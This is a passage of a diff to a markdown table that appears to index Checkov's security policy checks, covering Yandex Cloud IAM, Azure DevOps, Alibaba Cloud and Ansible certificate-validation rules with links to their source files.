[IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3696 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3697 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3698 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3699 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3700 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|------|--------------------------|----------------------------------|--------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | +| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | +| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | +| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | +| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | +| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | +| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | +| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | +| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | +| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | [OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) | +| 12 | CKV_ALI_11 | resource | alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) | +| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) | +| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) | +| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) | +| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) | +| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) | +| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one lowercase letter | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) | +| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) | +| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) | +| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) | +| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) | +| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) | +| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) | +| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM enforces MFA | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) | +| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) | +| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) | +| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) | +| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) | +| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) | +| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) | +| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | [K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) | +| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) | +| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) | +| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) | +| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) | +| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) | +| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) | +| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | [MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) | +| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) | +| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) | +| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) | +| 43 | CKV_ANSIBLE_1 | resource | [?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 44 | CKV_ANSIBLE_1 | resource | [?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 45 | CKV_ANSIBLE_1 | resource | [].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 46 | CKV_ANSIBLE_1 | resource | [].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 47 | CKV_ANSIBLE_1 | resource | [].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 48 | CKV_ANSIBLE_1 | resource | [].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 49 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 50 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 51 | CKV_ANSIBLE_1 | resource | [].tasks[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 52 | CKV_ANSIBLE_1 | resource | [].tasks[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 53 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 54 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 55 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 56 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 57 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 58 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 59 | CKV_ANSIBLE_2 | resource | [?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 60 | CKV_ANSIBLE_2 | resource | [?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 61 | CKV_ANSIBLE_2 | resource | [].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 62 | CKV_ANSIBLE_2 | resource | [].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 63 | CKV_ANSIBLE_2 | resource | [].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 64 | CKV_ANSIBLE_2 | resource | [].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 65 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 66 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 67 | CKV_ANSIBLE_2 | resource | [].tasks[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 68 | CKV_ANSIBLE_2 | resource | [].tasks[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 69 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 70 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 71 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 72 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 73 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 74 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 75 | CKV_ANSIBLE_3 | resource | [?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 76 | CKV_ANSIBLE_3 | resource | [?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 77 | CKV_ANSIBLE_3 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 78 | CKV_ANSIBLE_3 | resource | [].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 79 | CKV_ANSIBLE_3 | resource | [].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 80 | CKV_ANSIBLE_3 | resource | [].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 81 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 82 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 83 | CKV_ANSIBLE_3 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 84 | CKV_ANSIBLE_3 | resource | [].tasks[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 85 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 86 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 87 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 88 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 89 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 90 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 91 | CKV_ANSIBLE_4 | resource | [?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 92 | CKV_ANSIBLE_4 | resource | [?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 93 | CKV_ANSIBLE_4 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 94 | CKV_ANSIBLE_4 | resource | [].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 95 | CKV_ANSIBLE_4 | resource | [].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 96 | CKV_ANSIBLE_4 | resource | [].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 97 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 98 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 99 | CKV_ANSIBLE_4 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 100 | CKV_ANSIBLE_4 | resource | [].tasks[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 101 | CKV_ANSIBLE_4 | resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 102 | CKV_ANSIBLE_4 | resource | [].tasks[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | 